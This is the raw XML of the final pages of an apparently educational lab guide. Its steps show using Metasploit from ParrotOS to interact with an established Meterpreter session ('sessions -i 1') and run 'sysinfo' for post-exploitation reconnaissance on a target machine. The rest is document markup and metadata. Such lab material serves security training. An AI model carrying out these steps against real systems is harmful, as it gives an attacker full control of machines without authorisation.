                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. After execution, return to your ParrotOS terminal. You should now see a </w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Meterpreter shell</w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> established.</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008705DD" w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>View active sessions in Metasploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308D1237" w14:textId="3A9DDFA6" w:rsidR="0037552B" w:rsidRPr="001A500E" w:rsidRDefault="00CA1CB9" w:rsidP="00CA1CB9">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5599A6AA" wp14:editId="279B9648">
                  <wp:extent cx="4304119" cy="3384837"/>
                  <wp:effectExtent l="19050" t="19050" r="20320" b="25400"/>
                  <wp:docPr id="1733040443"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40443" name="Picture 11"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19418" cy="3396868"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="50527A84" w14:textId="122D9E21" w:rsidR="0037552B" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00021858" w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. To interact with the established Meterpreter shell, type </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sessions -i 1. </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>This will grant you full control over the target machine via Meterpreter.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="308964CF" w14:textId="54D82156" w:rsidR="008705DD" w:rsidRPr="001A500E" w:rsidRDefault="00CA1CB9" w:rsidP="00CA1CB9">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0283C89F" wp14:editId="3831C231">
                  <wp:extent cx="4362450" cy="4144497"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="27940"/>
                  <wp:docPr id="19720995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99530" name="Picture 19720995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70281" cy="4151937"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A15F0E6" w14:textId="75C96C6D" w:rsidR="006A0F0E" w:rsidRPr="001A500E" w:rsidRDefault="006A0F0E" w:rsidP="00CA1CB9">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B518E21" wp14:editId="386DD42A">
                  <wp:extent cx="4227792" cy="3952875"/>
                  <wp:effectExtent l="19050" t="19050" r="20955" b="9525"/>
                  <wp:docPr id="17361022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02297" name="Picture 173610229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63284" cy="3986059"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3F68FE" w14:textId="7BDE3CD1" w:rsidR="0037552B" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00021858" w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Once inside the Meterpreter shell, run </w:t>
            </w:r>
            <w:r w:rsidR="0044408D" w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Constantia" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Constantia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">sysinfo </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>command to gather system-level information about the target. This command displays the computer name, operating system version, architecture, and Meterpreter version. It helps assess the target system’s details, which is often the first step in a post-exploitation phase.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="102E8D8E" w14:textId="23551954" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="006A0F0E" w:rsidP="006A0F0E">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68ED4113" wp14:editId="5A31D0D1">
                  <wp:extent cx="4067175" cy="3848654"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="19050"/>
                  <wp:docPr id="14611140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114022" name="Picture 146111402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1380" cy="3871558"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="658576B8" w14:textId="751A8B2A" w:rsidR="00202BCA" w:rsidRPr="001A500E" w:rsidRDefault="00202BCA" w:rsidP="000374D7">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_1fob9te" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00202BCA" w:rsidRPr="001A500E" w:rsidSect="000F363C">
      <w:headerReference w:type="default" r:id="rId23"/>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11907" w:h="16839" w:code="9"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="882"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461B98" w16cex:dateUtc="2025-08-12T14:59:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="2C45F4CB" w16cex:dateUtc="2025-08-12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F32213" w16cid:durableId="2C461B98"/>
  <w16cid:commentId w16cid:paraId="13B2D772" w16cid:durableId="2C45F4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15A7F" w14:textId="77777777" w:rsidR="00092766" w:rsidRDefault="00092766" w:rsidP="002E5F73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="38D36C13" w14:textId="77777777" w:rsidR="00092766" w:rsidRDefault="00092766"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E7174" w14:textId="77777777" w:rsidR="00092766" w:rsidRDefault="00092766" w:rsidP="002E5F73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7CAD5ABB" w14:textId="77777777" w:rsidR="00092766" w:rsidRDefault="00092766"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F91AA8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="90C0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9"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9E2F84"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="28A2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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="697323AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6816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8"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
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="17"/>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4"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="14"/>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8"/>
  </w:num>
  <w:num w:numId="33">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 w:numId="37">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3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qBQCyKmAR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3734"/>
    <w:rsid w:val="0001531B"/>
    <w:rsid w:val="0001534D"/>
    <w:rsid w:val="00015600"/>
    <w:rsid w:val="000156FF"/>
    <w:rsid w:val="00016724"/>
    <w:rsid w:val="00016995"/>
    <w:rsid w:val="0001751A"/>
    <w:rsid w:val="0002007B"/>
    <w:rsid w:val="0002117D"/>
    <w:rsid w:val="000215B2"/>
    <w:rsid w:val="00021858"/>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4BB"/>
    <w:rsid w:val="000374D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6ACB"/>
    <w:rsid w:val="0008787A"/>
    <w:rsid w:val="00092766"/>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1CF"/>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0EF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19B"/>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0E"/>
    <w:rsid w:val="001A5029"/>
    <w:rsid w:val="001A5216"/>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290"/>
    <w:rsid w:val="00226C5B"/>
    <w:rsid w:val="002274A0"/>
    <w:rsid w:val="00227CCD"/>
    <w:rsid w:val="002300C9"/>
    <w:rsid w:val="002301BE"/>
    <w:rsid w:val="0023081D"/>
    <w:rsid w:val="00233682"/>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2D"/>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0BD3"/>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52B"/>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9E2"/>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5A4"/>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08D"/>
    <w:rsid w:val="00444978"/>
    <w:rsid w:val="00444A7C"/>
    <w:rsid w:val="00445686"/>
    <w:rsid w:val="0044769A"/>
    <w:rsid w:val="00447F46"/>
    <w:rsid w:val="00450EAE"/>
    <w:rsid w:val="004519F2"/>
    <w:rsid w:val="00451EAD"/>
    <w:rsid w:val="00452325"/>
    <w:rsid w:val="004528B8"/>
    <w:rsid w:val="00452B50"/>
    <w:rsid w:val="00453D23"/>
    <w:rsid w:val="004541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BEE"/>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26BD"/>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5A3"/>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7DE"/>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0F0E"/>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18D9"/>
    <w:rsid w:val="006C24AE"/>
    <w:rsid w:val="006C3343"/>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5DCE"/>
    <w:rsid w:val="006F6254"/>
    <w:rsid w:val="006F6489"/>
    <w:rsid w:val="006F6E9E"/>
    <w:rsid w:val="006F72D6"/>
    <w:rsid w:val="006F7E9A"/>
    <w:rsid w:val="00700CCE"/>
    <w:rsid w:val="007014A0"/>
    <w:rsid w:val="0070194E"/>
    <w:rsid w:val="00702104"/>
    <w:rsid w:val="0070234A"/>
    <w:rsid w:val="007023D6"/>
    <w:rsid w:val="007034B0"/>
    <w:rsid w:val="007035EC"/>
    <w:rsid w:val="007053DC"/>
    <w:rsid w:val="00705589"/>
    <w:rsid w:val="00706D9E"/>
    <w:rsid w:val="00710132"/>
    <w:rsid w:val="00710914"/>
    <w:rsid w:val="00710E1D"/>
    <w:rsid w:val="007112F6"/>
    <w:rsid w:val="00711D02"/>
    <w:rsid w:val="00712268"/>
    <w:rsid w:val="00713237"/>
    <w:rsid w:val="0071335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0A3"/>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2DB"/>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0F3E"/>
    <w:rsid w:val="007E148A"/>
    <w:rsid w:val="007E1946"/>
    <w:rsid w:val="007E1C5A"/>
    <w:rsid w:val="007E212C"/>
    <w:rsid w:val="007E2B23"/>
    <w:rsid w:val="007E40B7"/>
    <w:rsid w:val="007E4CEF"/>
    <w:rsid w:val="007E5BAC"/>
    <w:rsid w:val="007E6BEB"/>
    <w:rsid w:val="007F1C30"/>
    <w:rsid w:val="007F2298"/>
    <w:rsid w:val="007F281A"/>
    <w:rsid w:val="007F3587"/>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0D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05DD"/>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1E16"/>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42"/>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1D8"/>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32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758"/>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73B"/>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388"/>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1B56"/>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2C5A"/>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4539"/>
    <w:rsid w:val="00B25C9C"/>
    <w:rsid w:val="00B25CD0"/>
    <w:rsid w:val="00B25DDF"/>
    <w:rsid w:val="00B30D85"/>
    <w:rsid w:val="00B31939"/>
    <w:rsid w:val="00B32A70"/>
    <w:rsid w:val="00B32D71"/>
    <w:rsid w:val="00B3431B"/>
    <w:rsid w:val="00B347B3"/>
    <w:rsid w:val="00B34C44"/>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2A1"/>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6B82"/>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379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1CB9"/>
    <w:rsid w:val="00CA2870"/>
    <w:rsid w:val="00CA3349"/>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6B06"/>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395"/>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618"/>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1C98"/>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23F"/>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45C4"/>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1A84"/>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A3"/>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5CB2"/>
    <w:rsid w:val="00F56B70"/>
    <w:rsid w:val="00F60D97"/>
    <w:rsid w:val="00F60EE7"/>
    <w:rsid w:val="00F60FAC"/>
    <w:rsid w:val="00F611F1"/>
    <w:rsid w:val="00F614AC"/>
    <w:rsid w:val="00F620AC"/>
    <w:rsid w:val="00F622F5"/>
    <w:rsid w:val="00F62539"/>
    <w:rsid w:val="00F62B03"/>
    <w:rsid w:val="00F62B4B"/>
    <w:rsid w:val="00F6331C"/>
    <w:rsid w:val="00F63348"/>
    <w:rsid w:val="00F648CB"/>
    <w:rsid w:val="00F64ED6"/>
    <w:rsid w:val="00F65105"/>
    <w:rsid w:val="00F65281"/>
    <w:rsid w:val="00F65615"/>
    <w:rsid w:val="00F6630C"/>
    <w:rsid w:val="00F670F7"/>
    <w:rsid w:val="00F67876"/>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table" w:customStyle="1" w:styleId="TableGrid3">
    <w:name w:val="Table Grid3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00BE6B82"/>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705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DB998EE-9EF9-4A33-9CD9-BE51ECB7E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6</TotalTime>
  <Pages>9</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46</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-17T13:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-25T08:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>